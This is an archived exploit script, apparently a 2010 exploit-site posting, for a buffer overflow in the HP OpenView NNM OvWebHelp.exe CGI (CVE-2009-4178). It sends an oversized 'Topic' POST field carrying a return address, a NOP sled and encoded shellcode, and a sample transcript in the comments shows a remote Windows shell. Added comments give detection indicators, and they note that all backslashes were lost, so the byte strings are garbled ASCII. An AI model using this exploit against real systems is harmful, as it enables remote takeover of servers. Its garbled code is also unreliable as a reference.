HP OpenView NNM OvWebHelp.exe CGI Topic overflow
Posted on 30 March 2010
# ================================================ HP OpenView NNM OvWebHelp.exe CGI Topic overflow ================================================
#!/usr/bin/python
# Exploit title: HP OpenView NNM OvWebHelp.exe CGI Topic overflow
# Date: 2010.03.30
# Software link: http://hp.com
# Version: 7.53
# Tested on: Windows 2003 SP2
# CVE: 2009-4178
#
# NOTE(review): the archived listing has lost every backslash (compare the
# "C:Program FilesHP OpenViewwwwcgi-bin>" path in the transcript below), so the
# "x89xe3..." strings in this file are literal ASCII text, not byte escapes;
# as printed the script does not build the bytes the author describes.
# The code is Python 2 only (httplib, print statement).
#
# Defender summary (everything here is visible in the request built below):
# the overflow is delivered as a form-encoded POST to /OvCgi/OvWebHelp.exe,
# with the oversized 'Topic' parameter as the overflowing field. An oversized
# Topic/Target parameter on that CGI path in web-server logs or an IDS rule is
# a usable indicator; the fix is the vendor update for CVE-2009-4178 plus
# restricting network access to the NNM web CGIs.
#
# Code:
############################################
# Trying 172.16.29.130...
# Connected to 172.16.29.130.
# Escape character is '^]'.
# Microsoft Windows [Version 5.2.3790]
# (C) Copyright 1985-2003 Microsoft Corp.
#
# C:Program FilesHP OpenViewwwwcgi-bin>
############################################
import struct   # unused in this listing
import socket   # unused in this listing
import httplib
import urllib

# Encoded payload as emitted by the author's generator; its own note gives the
# size. The contents are opaque here and are not interpreted further.
#[*] x86/alpha_mixed succeeded with size 746 (iteration=1)
sc =(
"x89xe3xd9xc3xd9x73xf4x5dx55x59x49x49x49x49x49"
"x49x49x49x49x49x43x43x43x43x43x43x37x51x5ax6a"
"x41x58x50x30x41x30x41x6bx41x41x51x32x41x42x32"
"x42x42x30x42x42x41x42x58x50x38x41x42x75x4ax49"
"x4bx4cx49x78x4ex69x45x50x45x50x43x30x45x30x4e"
"x69x48x65x44x71x4bx62x45x34x4ex6bx51x42x44x70"
"x4cx4bx43x62x44x4cx4ex6bx50x52x44x54x4ex6bx43"
"x42x45x78x44x4fx4ex57x50x4ax45x76x50x31x4bx4f"
"x46x51x49x50x4cx6cx45x6cx43x51x43x4cx45x52x46"
"x4cx47x50x4fx31x48x4fx44x4dx43x31x49x57x4bx52"
"x48x70x51x42x43x67x4cx4bx50x52x46x70x4ex6bx47"
"x32x45x6cx47x71x48x50x4cx4bx47x30x44x38x4fx75"
"x49x50x50x74x51x5ax43x31x4ax70x42x70x4cx4bx43"
"x78x46x78x4ex6bx43x68x45x70x47x71x48x53x4ax43"
"x45x6cx47x39x4cx4bx47x44x4cx4bx47x71x4ax76x44"
"x71x4bx4fx45x61x49x50x4cx6cx4bx71x4ax6fx44x4d"
"x45x51x4ax67x47x48x4bx50x43x45x4bx44x46x63x51"
"x6dx49x68x45x6bx51x6dx46x44x43x45x4dx32x46x38"
"x4ex6bx42x78x44x64x45x51x49x43x45x36x4cx4bx44"
"x4cx50x4bx4ex6bx50x58x47x6cx45x51x49x43x4ex6b"
"x46x64x4ex6bx47x71x4ex30x4fx79x50x44x46x44x51"
"x34x43x6bx43x6bx43x51x51x49x42x7ax46x31x49x6f"
"x4bx50x50x58x43x6fx50x5ax4cx4bx44x52x48x6bx4b"
"x36x51x4dx51x78x45x63x46x52x43x30x43x30x43x58"
"x42x57x42x53x46x52x51x4fx50x54x51x78x42x6cx50"
"x77x47x56x47x77x4bx4fx4bx65x4cx78x4ax30x47x71"
"x47x70x43x30x51x39x49x54x51x44x50x50x45x38x46"
"x49x4dx50x50x6bx43x30x49x6fx49x45x50x50x42x70"
"x50x50x42x70x43x70x50x50x47x30x50x50x51x78x49"
"x7ax44x4fx49x4fx4bx50x4bx4fx4bx65x4ex69x4fx37"
"x50x31x49x4bx51x43x45x38x44x42x47x70x47x61x51"
"x4cx4ex69x4bx56x43x5ax46x70x42x76x51x47x50x68"
"x4bx72x49x4bx44x77x43x57x4bx4fx49x45x50x53x43"
"x67x45x38x48x37x49x79x44x78x49x6fx4bx4fx4ex35"
"x51x43x51x43x51x47x45x38x50x74x48x6cx47x4bx49"
"x71x49x6fx4ax75x42x77x4dx59x48x47x51x78x44x35"
"x42x4ex42x6dx50x61x49x6fx49x45x50x68x42x43x42"
"x4dx51x74x43x30x4dx59x49x73x50x57x46x37x43x67"
"x50x31x48x76x42x4ax45x42x46x39x46x36x4dx32x49"
"x6dx42x46x48x47x43x74x46x44x47x4cx47x71x43x31"
"x4ex6dx43x74x51x34x46x70x4fx36x43x30x42x64x46"
"x34x42x70x50x56x50x56x43x66x42x66x51x46x50x4e"
"x46x36x43x66x46x33x43x66x51x78x44x39x48x4cx47"
"x4fx4cx46x4bx4fx4bx65x4ex69x4dx30x42x6ex50x56"
"x43x76x49x6fx46x50x43x58x44x48x4dx57x47x6dx51"
"x70x49x6fx4ax75x4dx6bx4cx30x4cx75x4fx52x43x66"
"x42x48x4dx76x4fx65x4dx6dx4fx6dx49x6fx48x55x47"
"x4cx47x76x43x4cx45x5ax4bx30x4bx4bx4dx30x44x35"
"x43x35x4fx4bx51x57x42x33x51x62x50x6fx43x5ax45"
"x50x42x73x49x6fx4ax75x46x6ax41x41")

# 57 filler bytes precede the overwritten return address in this listing.
data="A"*57
# 5000-byte 'Target' value; the listing does not say whether it is needed for
# the overflow or is only padding.
data2 = "B"*5000
# Author's note: a 4-byte return address (a `call esp` in kernel32.dll on the
# tested Windows 2003 SP2 build, so not portable across builds), a 254-byte
# NOP sled, then the encoded payload. As written, the escapes are missing
# (see the header note), so these are plain ASCII strings.
ret = "xDFxf2xe5x77" + "x90" * 254 + sc # call esp kernel32.dll
payload = data + ret
# Overflow goes in the 'Topic' form field of the POST body.
p = urllib.urlencode({'Topic':payload,'Target':data2})
h = {"Content-Type": "application/x-www-form-urlencoded","Accept": "text/html","User-Agent": "BackTrack", "Accept-Language": "en"}
# Hard-coded lab host; there is no success check beyond printing the HTTP
# status line of the response.
c = httplib.HTTPConnection('172.16.29.130')
c.request("POST","/OvCgi/OvWebHelp.exe",p,h)
r = c.getresponse()
print r.status, r.reason
c.close()
print " Done "
# Inj3ct0r.com [2010-03-30]